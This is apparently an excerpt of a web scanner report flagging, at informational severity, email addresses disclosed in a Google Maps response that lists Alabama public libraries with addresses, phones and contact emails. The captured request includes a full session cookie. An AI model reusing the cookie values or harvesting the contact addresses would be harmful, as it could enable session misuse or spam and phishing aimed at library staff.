unity Library",sxcn:"",name:"MCHS Community Library",description:"\x3cb\x3eMCHS Community Library\x3c/b\x3e\x3cbr\x3eGuin, AL \x3cbr\x3e205-468-2544\x3cbr\x3e205-462-8047\x3cbr\x3e\x3ca href=\"mailto:mchs@sonet.net\" target=\"_blank\"\x3emchs@sonet.net\x3c/a\x3e",infoWindow:{title:"MCHS Community Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"MCHS Community LibraryGuin, AL 205-468-2544205-462-8047mchs@sonet.net",dscr:"\x3cb\x3eMCHS Community Library\x3c/b\x3e\x3cbr\x3eGuin, AL \x3cbr\x3e205-468-2544\x3cbr\x3e205-462-8047\x3cbr\x3e\x3ca href=\"mailto:mchs@sonet.net\" target=\"_blank\"\x3emchs@sonet.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.976819,-87.895568\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
c Library",description:"\x3cb\x3eWashington County Public Library\x3c/b\x3e\x3cbr\x3eHighway 56\x3cbr\x3eChatom, AL 36518-1057\x3cbr\x3e251-847-2097\x3cbr\x3e251-847-2098\x3cbr\x3e\x3ca href=\"mailto:wcpls@acan.net\" target=\"_blank\"\x3ewcpls@acan.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.wcpls.org\" target=\"_blank\"\x3ewww.wcpls.org\x3c/a\x3e",infoWindow:{title:"Washington County Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",sn
...[SNIP]...
251-847-2097251-",dscr:"\x3cb\x3eWashington County Public Library\x3c/b\x3e\x3cbr\x3eHighway 56\x3cbr\x3eChatom, AL 36518-1057\x3cbr\x3e251-847-2097\x3cbr\x3e251-847-2098\x3cbr\x3e\x3ca href=\"mailto:wcpls@acan.net\" target=\"_blank\"\x3ewcpls@acan.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.wcpls.org\" target=\"_blank\"\x3ewww.wcpls.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.458143,-88.2
...[SNIP]...
ption:"\x3cb\x3eUnion Springs Public Library\x3c/b\x3e\x3cbr\x3e103 North Prairie Street\x3cbr\x3eUnion Springs, AL 36089-1616\x3cbr\x3e334-738-2760\x3cbr\x3e334-738-2760\x3cbr\x3e\x3ca href=\"mailto:ancali4us2000@yahoo.com\" target=\"_blank\"\x3eancali4us2000@yahoo.com\x3c/a\x3e",infoWindow:{title:"Union Springs Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Union Springs Public Library103 North Prairie StreetUnion Springs, AL 36089-161
...[SNIP]...
,dscr:"\x3cb\x3eUnion Springs Public Library\x3c/b\x3e\x3cbr\x3e103 North Prairie Street\x3cbr\x3eUnion Springs, AL 36089-1616\x3cbr\x3e334-738-2760\x3cbr\x3e334-738-2760\x3cbr\x3e\x3ca href=\"mailto:ancali4us2000@yahoo.com\" target=\"_blank\"\x3eancali4us2000@yahoo.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.143368,-85.716148\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ion:"\x3cb\x3eGreenville-Butler County Public Library\x3c/b\x3e\x3cbr\x3e309 Ft Dale Street\x3cbr\x3eGreenville, AL 36037-1401\x3cbr\x3e334-382-3216\x3cbr\x3e334-382-9769\x3cbr\x3e\x3ca href=\"mailto:gbcpl@alaweb.com\" target=\"_blank\"\x3egbcpl@alaweb.com\x3c/a\x3e",infoWindow:{title:"Greenville-Butler County Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Greenville-Butler County Public Library309 Ft Dale StreetGreenville,
...[SNIP]...
scr:"\x3cb\x3eGreenville-Butler County Public Library\x3c/b\x3e\x3cbr\x3e309 Ft Dale Street\x3cbr\x3eGreenville, AL 36037-1401\x3cbr\x3e334-382-3216\x3cbr\x3e334-382-9769\x3cbr\x3e\x3ca href=\"mailto:gbcpl@alaweb.com\" target=\"_blank\"\x3egbcpl@alaweb.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.832806,-86.627373\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
"Opp Public Library",description:"\x3cb\x3eOpp Public Library\x3c/b\x3e\x3cbr\x3e1604 North Main Street\x3cbr\x3eOpp, AL 36467\x3cbr\x3e334-496-6423\x3cbr\x3e334-493-6423\x3cbr\x3e\x3ca href=\"mailto:opppubliclibrary@hotmail.com\" target=\"_blank\"\x3eopppubliclibrary@hotmail.com\x3c/a\x3e",infoWindow:{title:"Opp Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Opp Public Library1604 North Main StreetOpp, AL 36467334-496-6423334-493-6423op",dscr:"\x3cb\x3eOpp Public Library\x3c/b\x3e\x3cbr\x3e1604 North Main Street\x3cbr\x3eOpp, AL 36467\x3cbr\x3e334-496-6423\x3cbr\x3e334-493-6423\x3cbr\x3e\x3ca href=\"mailto:opppubliclibrary@hotmail.com\" target=\"_blank\"\x3eopppubliclibrary@hotmail.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.312763,-86.258547\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
xcn:"",name:"Brantley Public Library",description:"\x3cb\x3eBrantley Public Library\x3c/b\x3e\x3cbr\x3eBrantley, AL 36009-0045\x3cbr\x3e334-527-8624\x3cbr\x3e334-527-3216\x3cbr\x3e\x3ca href=\"mailto:brantleypublib@hotmail.com\" target=\"_blank\"\x3ebrantleypublib@hotmail.com\x3c/a\x3e",infoWindow:{title:"Brantley Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Brantley Public LibraryBrantley, AL 36009-0045334-527-8624334-527-3216brantleyp",dscr:"\x3cb\x3eBrantley Public Library\x3c/b\x3e\x3cbr\x3eBrantley, AL 36009-0045\x3cbr\x3e334-527-8624\x3cbr\x3e334-527-3216\x3cbr\x3e\x3ca href=\"mailto:brantleypublib@hotmail.com\" target=\"_blank\"\x3ebrantleypublib@hotmail.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.577615,-86.282991\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
blic Library",sxcn:"",name:"Luverne Public Library",description:"\x3cb\x3eLuverne Public Library\x3c/b\x3e\x3cbr\x3e148 East Third Avenue \x3cbr\x3eLuberne, AL \x3cbr\x3e\x3cbr\x3e\x3ca href=\"mailto:rlester@troycable.net\" target=\"_blank\"\x3erlester@troycable.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://library.luverne.org\" target=\"_blank\"\x3ehttp://library.luverne.org\x3c/a\x3e",infoWindow:{title:"Luverne Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e
...[SNIP]...
48 East Third Avenue Luberne, AL rlester@troycable.netht",dscr:"\x3cb\x3eLuverne Public Library\x3c/b\x3e\x3cbr\x3e148 East Third Avenue \x3cbr\x3eLuberne, AL \x3cbr\x3e\x3cbr\x3e\x3ca href=\"mailto:rlester@troycable.net\" target=\"_blank\"\x3erlester@troycable.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://library.luverne.org\" target=\"_blank\"\x3ehttp://library.luverne.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26
...[SNIP]...
description:"\x3cb\x3eCullman County Pub Library System\x3c/b\x3e\x3cbr\x3e200 Clark Street NE\x3cbr\x3eCullman, AL 35055-2997\x3cbr\x3e256-734-1068\x3cbr\x3e256-734-6902\x3cbr\x3e\x3ca href=\"mailto:myrickj@ccpls.com\" target=\"_blank\"\x3emyrickj@ccpls.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.ccpls.com\" target=\"_blank\"\x3ehttp://www.ccpls.com\x3c/a\x3e",infoWindow:{title:"Cullman County Pub Library System",basics:"\x3cdiv transclude=\"iw\"\x3e\
...[SNIP]...
256-7",dscr:"\x3cb\x3eCullman County Pub Library System\x3c/b\x3e\x3cbr\x3e200 Clark Street NE\x3cbr\x3eCullman, AL 35055-2997\x3cbr\x3e256-734-1068\x3cbr\x3e256-734-6902\x3cbr\x3e\x3ca href=\"mailto:myrickj@ccpls.com\" target=\"_blank\"\x3emyrickj@ccpls.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.ccpls.com\" target=\"_blank\"\x3ehttp://www.ccpls.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=3
...[SNIP]...
rary",description:"\x3cb\x3eAriton-Dot Laney Memorial Library\x3c/b\x3e\x3cbr\x3e30 Main Street\x3cbr\x3eAriton, AL 36311-0026\x3cbr\x3e334-762-2463\x3cbr\x3e334-762-2463\x3cbr\x3e\x3ca href=\"mailto:aritondot@centurytel.net\" target=\"_blank\"\x3earitondot@centurytel.net\x3c/a\x3e",infoWindow:{title:"Ariton-Dot Laney Memorial Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Ariton-Dot Laney Memorial Library30 Main StreetAriton, AL 36311-0026334-762-246",dscr:"\x3cb\x3eAriton-Dot Laney Memorial Library\x3c/b\x3e\x3cbr\x3e30 Main Street\x3cbr\x3eAriton, AL 36311-0026\x3cbr\x3e334-762-2463\x3cbr\x3e334-762-2463\x3cbr\x3e\x3ca href=\"mailto:aritondot@centurytel.net\" target=\"_blank\"\x3earitondot@centurytel.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.600437,-85.717160\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
Library",description:"\x3cb\x3eDaleville Public Library\x3c/b\x3e\x3cbr\x3e308 Donnell Blvd\x3cbr\x3eDaleville, AL 36322-2118\x3cbr\x3e334-503-9119\x3cbr\x3e334-503-9119\x3cbr\x3e\x3ca href=\"mailto:read@daleville.k12.al.us\" target=\"_blank\"\x3eread@daleville.k12.al.us\x3c/a\x3e",infoWindow:{title:"Daleville Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Daleville Public Library308 Donnell BlvdDaleville, AL 36322-2118334-503-9119334",dscr:"\x3cb\x3eDaleville Public Library\x3c/b\x3e\x3cbr\x3e308 Donnell Blvd\x3cbr\x3eDaleville, AL 36322-2118\x3cbr\x3e334-503-9119\x3cbr\x3e334-503-9119\x3cbr\x3e\x3ca href=\"mailto:read@daleville.k12.al.us\" target=\"_blank\"\x3eread@daleville.k12.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.314179,-85.707303\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
Public Library",description:"\x3cb\x3eNewton Public Library\x3c/b\x3e\x3cbr\x3e209 Oates Drive\x3cbr\x3eNewton, AL 36352-4314\x3cbr\x3e334-299-3316\x3cbr\x3e334-299-3316\x3cbr\x3e\x3ca href=\"mailto:newtonlibrary@sw.rr.com\" target=\"_blank\"\x3enewtonlibrary@sw.rr.com\x3c/a\x3e",infoWindow:{title:"Newton Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Newton Public Library209 Oates DriveNewton, AL 36352-4314334-299-3316334-299-33",dscr:"\x3cb\x3eNewton Public Library\x3c/b\x3e\x3cbr\x3e209 Oates Drive\x3cbr\x3eNewton, AL 36352-4314\x3cbr\x3e334-299-3316\x3cbr\x3e334-299-3316\x3cbr\x3e\x3ca href=\"mailto:newtonlibrary@sw.rr.com\" target=\"_blank\"\x3enewtonlibrary@sw.rr.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.330908,-85.596205\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...

22.69. http://maps.google.com/maps/sf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/sf

Issue detail

The following email addresses were disclosed in the response:

Request

GET /maps/sf?q=http%3A%2F%2Fwww.alabama.gov%2Frss%2Fmaps_LIBRARIES.kml&start=100&jsv=310c&vps=1&source=maps_api&callback=_xdc_._kgn3tnp3l HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.alabama.gov/portal/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=DEntMOM-vLiKsZ_1SG3HUd0B0oGbRKXtRpi1pq3lEVMkOSBMrvdVv72rCBr0341W89kHA-PBZDI3vmV4fFluvryIdICZc8i1bWqGwoBC29F_oZvehlhP4A1MlN_8jpYE

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 30 Apr 2011 00:36:49 GMT
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 30 Apr 2011 00:36:49 GMT
Server: mfe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 75428

_xdc_._kgn3tnp3l && _xdc_._kgn3tnp3l({"name":"http://www.alabama.gov/rss/maps_LIBRARIES.kml","Status":{"code":200,"request":"geoxml"},viewport: {center: {lat: 32.656876,lng: -86.656030},span: {lat: 0.
...[SNIP]...
c.",description:"\x3cb\x3eOzark-Dale Co. Public Library Inc.\x3c/b\x3e\x3cbr\x3e416 James Street\x3cbr\x3eOzark, AL 36360-2090\x3cbr\x3e334-774-5480\x3cbr\x3e334-774-9156\x3cbr\x3e\x3ca href=\"mailto:library@odcpl.com\" target=\"_blank\"\x3elibrary@odcpl.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.odcpl.com\" target=\"_blank\"\x3ehttp://www.odcpl.com\x3c/a\x3e",infoWindow:{title:"Ozark-Dale Co. Public Library Inc.",basics:"\x3cdiv transclude=\"iw\"\x3e
...[SNIP]...
334-774-5",dscr:"\x3cb\x3eOzark-Dale Co. Public Library Inc.\x3c/b\x3e\x3cbr\x3e416 James Street\x3cbr\x3eOzark, AL 36360-2090\x3cbr\x3e334-774-5480\x3cbr\x3e334-774-9156\x3cbr\x3e\x3ca href=\"mailto:library@odcpl.com\" target=\"_blank\"\x3elibrary@odcpl.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.odcpl.com\" target=\"_blank\"\x3ehttp://www.odcpl.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=3
...[SNIP]...
y",description:"\x3cb\x3eSelma-Dallas County Public Library\x3c/b\x3e\x3cbr\x3e1103 Selma Avenue\x3cbr\x3eSelma, AL 36703-4498\x3cbr\x3e334-874-1725\x3cbr\x3e334-874-1729\x3cbr\x3e\x3ca href=\"mailto:becky@selmalibrary.org\" target=\"_blank\"\x3ebecky@selmalibrary.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.selmalibrary.org\" target=\"_blank\"\x3ewww.selmalibrary.org\x3c/a\x3e",infoWindow:{title:"Selma-Dallas County Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e
...[SNIP]...
334-874-",dscr:"\x3cb\x3eSelma-Dallas County Public Library\x3c/b\x3e\x3cbr\x3e1103 Selma Avenue\x3cbr\x3eSelma, AL 36703-4498\x3cbr\x3e334-874-1725\x3cbr\x3e334-874-1729\x3cbr\x3e\x3ca href=\"mailto:becky@selmalibrary.org\" target=\"_blank\"\x3ebecky@selmalibrary.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.selmalibrary.org\" target=\"_blank\"\x3ewww.selmalibrary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=3
...[SNIP]...
ription:"\x3cb\x3eCollinsville Public Library\x3c/b\x3e\x3cbr\x3e4299 Alabama Highway 68\x3cbr\x3eColllinsville, AL 35961-0743\x3cbr\x3e256-524-2323\x3cbr\x3e256-524-2121\x3cbr\x3e\x3ca href=\"mailto:jencollib@hotmail.com\" target=\"_blank\"\x3ejencollib@hotmail.com\x3c/a\x3e",infoWindow:{title:"Collinsville Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Collinsville Public Library4299 Alabama Highway 68Colllinsville, AL 35961-07432",dscr:"\x3cb\x3eCollinsville Public Library\x3c/b\x3e\x3cbr\x3e4299 Alabama Highway 68\x3cbr\x3eColllinsville, AL 35961-0743\x3cbr\x3e256-524-2323\x3cbr\x3e256-524-2121\x3cbr\x3e\x3ca href=\"mailto:jencollib@hotmail.com\" target=\"_blank\"\x3ejencollib@hotmail.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.276881,-85.854731\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ibrary",description:"\x3cb\x3eCrossville Public Library\x3c/b\x3e\x3cbr\x3e80 Gaines Street\x3cbr\x3eCrossville, AL 35962-0308\x3cbr\x3e256-528-2628\x3cbr\x3e256-528-2628\x3cbr\x3e\x3ca href=\"mailto:cplib@charter.net\" target=\"_blank\"\x3ecplib@charter.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.angelfire.com/al/cplib\" target=\"_blank\"\x3ehttp://www.angelfire.com/al/cplib\x3c/a\x3e",infoWindow:{title:"Crossville Public Library",basics:"\x3cdiv tran
...[SNIP]...
256-528-26282",dscr:"\x3cb\x3eCrossville Public Library\x3c/b\x3e\x3cbr\x3e80 Gaines Street\x3cbr\x3eCrossville, AL 35962-0308\x3cbr\x3e256-528-2628\x3cbr\x3e256-528-2628\x3cbr\x3e\x3ca href=\"mailto:cplib@charter.net\" target=\"_blank\"\x3ecplib@charter.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.angelfire.com/al/cplib\" target=\"_blank\"\x3ehttp://www.angelfire.com/al/cplib\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbna
...[SNIP]...
",description:"\x3cb\x3eDeKalb County Public Library\x3c/b\x3e\x3cbr\x3e504 Grand Avenue NW\x3cbr\x3eFort Payne, AL 35967-2313\x3cbr\x3e256-845-2671\x3cbr\x3e256-845-2671\x3cbr\x3e\x3ca href=\"mailto:etucker_dkb@yahoo.com\" target=\"_blank\"\x3eetucker_dkb@yahoo.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://ww.lmn.lib.al.us\" target=\"_blank\"\x3ehttp://ww.lmn.lib.al.us\x3c/a\x3e",infoWindow:{title:"DeKalb County Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e
...[SNIP]...
256-845",dscr:"\x3cb\x3eDeKalb County Public Library\x3c/b\x3e\x3cbr\x3e504 Grand Avenue NW\x3cbr\x3eFort Payne, AL 35967-2313\x3cbr\x3e256-845-2671\x3cbr\x3e256-845-2671\x3cbr\x3e\x3ca href=\"mailto:etucker_dkb@yahoo.com\" target=\"_blank\"\x3eetucker_dkb@yahoo.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://ww.lmn.lib.al.us\" target=\"_blank\"\x3ehttp://ww.lmn.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x
...[SNIP]...
ary",description:"\x3cb\x3eGeraldine Public Library\x3c/b\x3e\x3cbr\x3e13543 Alabama Hwy 227\x3cbr\x3eGeraldine, AL 35974-0268\x3cbr\x3e256-659-6663\x3cbr\x3e256-659-6663\x3cbr\x3e\x3ca href=\"mailto:geraldn2@farmerstel.com\" target=\"_blank\"\x3egeraldn2@farmerstel.com\x3c/a\x3e",infoWindow:{title:"Geraldine Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Geraldine Public Library13543 Alabama Hwy 227Geraldine, AL 35974-0268256-659-66",dscr:"\x3cb\x3eGeraldine Public Library\x3c/b\x3e\x3cbr\x3e13543 Alabama Hwy 227\x3cbr\x3eGeraldine, AL 35974-0268\x3cbr\x3e256-659-6663\x3cbr\x3e256-659-6663\x3cbr\x3e\x3ca href=\"mailto:geraldn2@farmerstel.com\" target=\"_blank\"\x3egeraldn2@farmerstel.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.359720,-86.009760\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
c Library",description:"\x3cb\x3eIder Public Library\x3c/b\x3e\x3cbr\x3e10808 Alabama Highway 75 \x3cbr\x3eIder, AL 35981-0202\x3cbr\x3e256-657-2170\x3cbr\x3e256-657-3178\x3cbr\x3e\x3ca href=\"mailto:iderpl1@farmerstel.com\" target=\"_blank\"\x3eiderpl1@farmerstel.com\x3c/a\x3e",infoWindow:{title:"Ider Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Ider Public Library10808 Alabama Highway 75 Ider, AL 35981-0202256-657-2170256-",dscr:"\x3cb\x3eIder Public Library\x3c/b\x3e\x3cbr\x3e10808 Alabama Highway 75 \x3cbr\x3eIder, AL 35981-0202\x3cbr\x3e256-657-2170\x3cbr\x3e256-657-3178\x3cbr\x3e\x3ca href=\"mailto:iderpl1@farmerstel.com\" target=\"_blank\"\x3eiderpl1@farmerstel.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.724080,-85.646549\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ry",description:"\x3cb\x3eRainsville Public Library\x3c/b\x3e\x3cbr\x3e941 East Main Street\x3cbr\x3eRainsville, AL 35986-0509\x3cbr\x3e256-638-3311\x3cbr\x3e256-638-3314\x3cbr\x3e\x3ca href=\"mailto:rpl1@farmerstel.com\" target=\"_blank\"\x3erpl1@farmerstel.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://rainsvillepublibrary.homestead.com\" target=\"_blank\"\x3ehttp://rainsvillepublibrary.homestead.com\x3c/a\x3e",infoWindow:{title:"Rainsville Public Library",basi
...[SNIP]...
256-638-3",dscr:"\x3cb\x3eRainsville Public Library\x3c/b\x3e\x3cbr\x3e941 East Main Street\x3cbr\x3eRainsville, AL 35986-0509\x3cbr\x3e256-638-3311\x3cbr\x3e256-638-3314\x3cbr\x3e\x3ca href=\"mailto:rpl1@farmerstel.com\" target=\"_blank\"\x3erpl1@farmerstel.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://rainsvillepublibrary.homestead.com\" target=\"_blank\"\x3ehttp://rainsvillepublibrary.homestead.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cb
...[SNIP]...
brary",description:"\x3cb\x3eMillbrook Public Library\x3c/b\x3e\x3cbr\x3e3650 Grandview Road\x3cbr\x3eMillbrook, AL 36054-0525\x3cbr\x3e334-285-6688\x3cbr\x3e334-285-0152\x3cbr\x3e\x3ca href=\"mailto:millbrooklib@elmore.rr.com\" target=\"_blank\"\x3emillbrooklib@elmore.rr.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://apls.state.al.us/libraries/millbrook/index.html\" target=\"_blank\"\x3ehttp://apls.state.al.us/libraries/millbrook/index.html\x3c/a\x3e",infoWindow:{title:"Millb
...[SNIP]...
334-285-6688",dscr:"\x3cb\x3eMillbrook Public Library\x3c/b\x3e\x3cbr\x3e3650 Grandview Road\x3cbr\x3eMillbrook, AL 36054-0525\x3cbr\x3e334-285-6688\x3cbr\x3e334-285-0152\x3cbr\x3e\x3ca href=\"mailto:millbrooklib@elmore.rr.com\" target=\"_blank\"\x3emillbrooklib@elmore.rr.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://apls.state.al.us/libraries/millbrook/index.html\" target=\"_blank\"\x3ehttp://apls.state.al.us/libraries/millbrook/index.html\x3c/a\x3e",dscr_dir:"ltr",photoUrl:
...[SNIP]...
,description:"\x3cb\x3eAthens-Limestone Public Library\x3c/b\x3e\x3cbr\x3e405 East South Street\x3cbr\x3eAthens, AL 35611-2664\x3cbr\x3e256-232-1233\x3cbr\x3e256-232-1250\x3cbr\x3e\x3ca href=\"mailto:stodd@athenslimestone.lib.al.us\" target=\"_blank\"\x3estodd@athenslimestone.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.athenslimestone.lib.al.us\" target=\"_blank\"\x3ehttp://www.athenslimestone.lib.al.us\x3c/a\x3e",infoWindow:{title:"Athens-Limestone Public Library",basics:"
...[SNIP]...
256-23",dscr:"\x3cb\x3eAthens-Limestone Public Library\x3c/b\x3e\x3cbr\x3e405 East South Street\x3cbr\x3eAthens, AL 35611-2664\x3cbr\x3e256-232-1233\x3cbr\x3e256-232-1250\x3cbr\x3e\x3ca href=\"mailto:stodd@athenslimestone.lib.al.us\" target=\"_blank\"\x3estodd@athenslimestone.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.athenslimestone.lib.al.us\" target=\"_blank\"\x3ehttp://www.athenslimestone.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=t
...[SNIP]...
n:"\x3cb\x3eHayneville/Lowndes County Public Library\x3c/b\x3e\x3cbr\x3e4 Washington Street\x3cbr\x3eHayneville, AL 36040-0425\x3cbr\x3e334-548-2686\x3cbr\x3e334-548-2686\x3cbr\x3e\x3ca href=\"mailto:htcard@htcnet.net\" target=\"_blank\"\x3ehtcard@htcnet.net\x3c/a\x3e",infoWindow:{title:"Hayneville/Lowndes County Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Hayneville/Lowndes County Public Library4 Washington StreetHaynevill
...[SNIP]...
r:"\x3cb\x3eHayneville/Lowndes County Public Library\x3c/b\x3e\x3cbr\x3e4 Washington Street\x3cbr\x3eHayneville, AL 36040-0425\x3cbr\x3e334-548-2686\x3cbr\x3e334-548-2686\x3cbr\x3e\x3ca href=\"mailto:htcard@htcnet.net\" target=\"_blank\"\x3ehtcard@htcnet.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.183313,-86.579993\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ibrary",description:"\x3cb\x3eWhite Hall Public Library\x3c/b\x3e\x3cbr\x3e640 Freedom Road\x3cbr\x3eWhite Hall, AL 36040-2830\x3cbr\x3e334-874-7323\x3cbr\x3e334-874-7323\x3cbr\x3e\x3ca href=\"mailto:e.williams@mindspring.com\" target=\"_blank\"\x3ee.williams@mindspring.com\x3c/a\x3e",infoWindow:{title:"White Hall Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"White Hall Public Library640 Freedom RoadWhite Hall, AL 36040-2830334-874-73233",dscr:"\x3cb\x3eWhite Hall Public Library\x3c/b\x3e\x3cbr\x3e640 Freedom Road\x3cbr\x3eWhite Hall, AL 36040-2830\x3cbr\x3e334-874-7323\x3cbr\x3e334-874-7323\x3cbr\x3e\x3ca href=\"mailto:e.williams@mindspring.com\" target=\"_blank\"\x3ee.williams@mindspring.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.296380,-86.712824\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
description:"\x3cb\x3eMacon County-Tuskegee Public Library\x3c/b\x3e\x3cbr\x3e302 Main Street\x3cbr\x3eTuskegee, AL 36083-1806\x3cbr\x3e334-727-5192\x3cbr\x3e334-727-5989\x3cbr\x3e\x3ca href=\"mailto:mclark99@bellsouth.net\" target=\"_blank\"\x3emclark99@bellsouth.net\x3c/a\x3e",infoWindow:{title:"Macon County-Tuskegee Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Macon County-Tuskegee Public Library302 Main StreetTuskegee, AL 36083-1
...[SNIP]...
